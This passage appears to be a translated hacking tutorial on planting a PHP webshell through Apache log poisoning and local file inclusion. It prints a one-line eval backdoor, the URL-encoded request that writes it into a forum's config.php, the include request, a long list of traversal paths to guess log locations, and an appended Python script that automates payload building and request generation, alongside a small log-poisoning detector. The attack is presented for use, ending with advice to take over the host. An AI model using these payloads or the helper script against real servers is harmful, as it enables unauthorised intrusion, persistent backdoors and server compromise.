Because the method above is impractical (in my testing the log was routinely tens of megabytes, which makes it no fun to work with), the next step is to go a little deeper and write a real webshell to use instead, which beats the painfully slow approach above by a wide margin.

For example, again using this one-line backdoor:

<?eval($_POST[cmd]);?>
By now you may have thought of it yourself: this is a pretty good approach. The next question is how to get it written. Use this statement: fopen the file /home/virtual/www.xxx.com/forum/config.php, then write the server side of the one-line backdoor, <?eval($_POST[cmd]);?>, into it. Expressed as a single PHP statement that is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,'<?eval($_POST[cmd]);?>');fclose($fp);?> //writes the one-line backdoor into config.php

(Note the single quotes around the one-liner: inside a double-quoted string PHP would interpolate $_POST[cmd] while the writer runs, and config.php would end up containing <?eval();?> instead of the backdoor.)

We submit this statement in a request so that Apache records it in the error log, then include the log and the shell is written. Remember that the statement must be URL-encoded or it will not work: Apache decodes the request path before logging the "File does not exist" error, so the decoded PHP is what lands in the error log.

Encoded:

%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E

We submit:

http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%27%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%27%29%3Bfclose%28%24fp%29%3B%3F%3E

The error log now contains that line of webshell-writing code.

Next we include the log by submitting:

http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell is written: config.php now contains the one-line backdoor.
OK.
http://www.xxx.com/forum/config.php is now our webshell.
Connect to it with lanker's client and the host is yours.

PS: The prerequisite for all of the above is that the target file (or the directory holding it) is writable by the user Apache runs as; in practice that means the directory shows -rwxrwxrwx (777), which you can check directly against the directory listing given above. Everything above also assumes the log path is already known.

For other log paths you can guess, or refer to this list. (The extra ../ segments are harmless once the filesystem root is reached, which is why the relative entries pad them generously.)
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
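As an added example (not the original post's code), the following Python puts the whole chain from the post together offline: it builds the config.php-writing payload, percent-encodes it the same way the post does (every byte that is not an ASCII letter or digit becomes %XX, so "." "_" and "/" are encoded too, which urllib.parse.quote would leave alone), generates one include request per candidate log path from the list above, and runs a simple check over constructed log lines that flags a poisoned entry, which is the detection side of the same technique. The host xxx.com, the script z.php and its zizzy parameter are taken from the post; the sample log lines are constructed here and are not real captures.

```python
"""Apache log-poisoning helpers for the LFI chain in the post (added example)."""
import re
from urllib.parse import unquote

# Target file and one-liner from the post.
TARGET = "/home/virtual/www.xxx.com/forum/config.php"
ONE_LINER = "<?eval($_POST[cmd]);?>"


def writer_payload(target=TARGET, shell=ONE_LINER):
    """PHP that writes `shell` into `target` when the poisoned log is included.

    The one-liner sits in a SINGLE-quoted string: in a double-quoted string PHP
    would interpolate $_POST[cmd] while the writer runs, leaving <?eval();?>
    in config.php instead of the backdoor.
    """
    return "<?$fp=fopen(\"%s\",\"w+\");fputs($fp,'%s');fclose($fp);?>" % (target, shell)


def percent_encode(text):
    """Encode every byte that is not an ASCII letter or digit as %XX (uppercase).

    This reproduces the post's encoding exactly; urllib.parse.quote would leave
    '.', '_', '-' and '~' unencoded, which Apache also accepts but which would
    not match the strings shown in the post.
    """
    out = []
    for byte in text.encode("utf-8"):
        ch = chr(byte)
        out.append(ch if ch.isascii() and ch.isalnum() else "%%%02X" % byte)
    return "".join(out)


def poison_url(host, payload):
    """Request for a path that does not exist: Apache answers 404 and writes
    'File does not exist: <docroot>/<decoded path>' to its error log, which is
    what the percent-encoding step in the post relies on."""
    return "http://%s/%s" % (host, percent_encode(payload))


def include_urls(host, script, param, log_paths):
    """One LFI request per candidate log location (e.g. the list above)."""
    return ["http://%s/%s?%s=%s" % (host, script, param, p) for p in log_paths]


# Detection side: flag log entries that carry PHP. Access logs keep the request
# line raw (still percent-encoded); error logs store the decoded filename.
PHP_CALL = re.compile(
    r"<\?(?:php)?.*?\b(?:eval|fputs|fwrite|file_put_contents|system|passthru)\s*\(",
    re.S,
)


def looks_poisoned(log_line):
    """True if the line contains a PHP open tag followed by a dangerous call,
    after percent-decoding twice (to also catch double-encoded requests)."""
    decoded = unquote(unquote(log_line))
    return PHP_CALL.search(decoded) is not None


# Constructed sample log lines (illustrative, not real captures).
SAMPLE_ACCESS = (
    '10.0.0.5 - - [12/Mar/2009:10:11:12 +0800] "GET /%s HTTP/1.1" 404 211 "-" "-"'
    % percent_encode(writer_payload())
)
SAMPLE_ERROR = (
    "[Thu Mar 12 10:11:12 2009] [error] [client 10.0.0.5] File does not exist: "
    "/home/virtual/www.xxx.com/" + writer_payload()
)
SAMPLE_BENIGN = (
    '10.0.0.7 - - [12/Mar/2009:10:11:13 +0800] "GET /forum/index.php?id=3 HTTP/1.1" '
    '200 5120 "-" "-"'
)

if __name__ == "__main__":
    print(poison_url("xxx.com", writer_payload()))
    for url in include_urls("xxx.com", "z.php", "zizzy",
                            ["/var/log/httpd/error_log", "/var/log/apache/error.log"]):
        print(url)
    for line in (SAMPLE_ACCESS, SAMPLE_ERROR, SAMPLE_BENIGN):
        print(looks_poisoned(line), line[:70])
```

The detector decodes twice on purpose: a request like /%253C%253Feval... passes the first decode as %3C%3Feval... and would otherwise slip past a check that only decodes once. Running looks_poisoned over the candidate log files from the list above, on a box you administer, is a quick way to tell whether someone has already tried this against you.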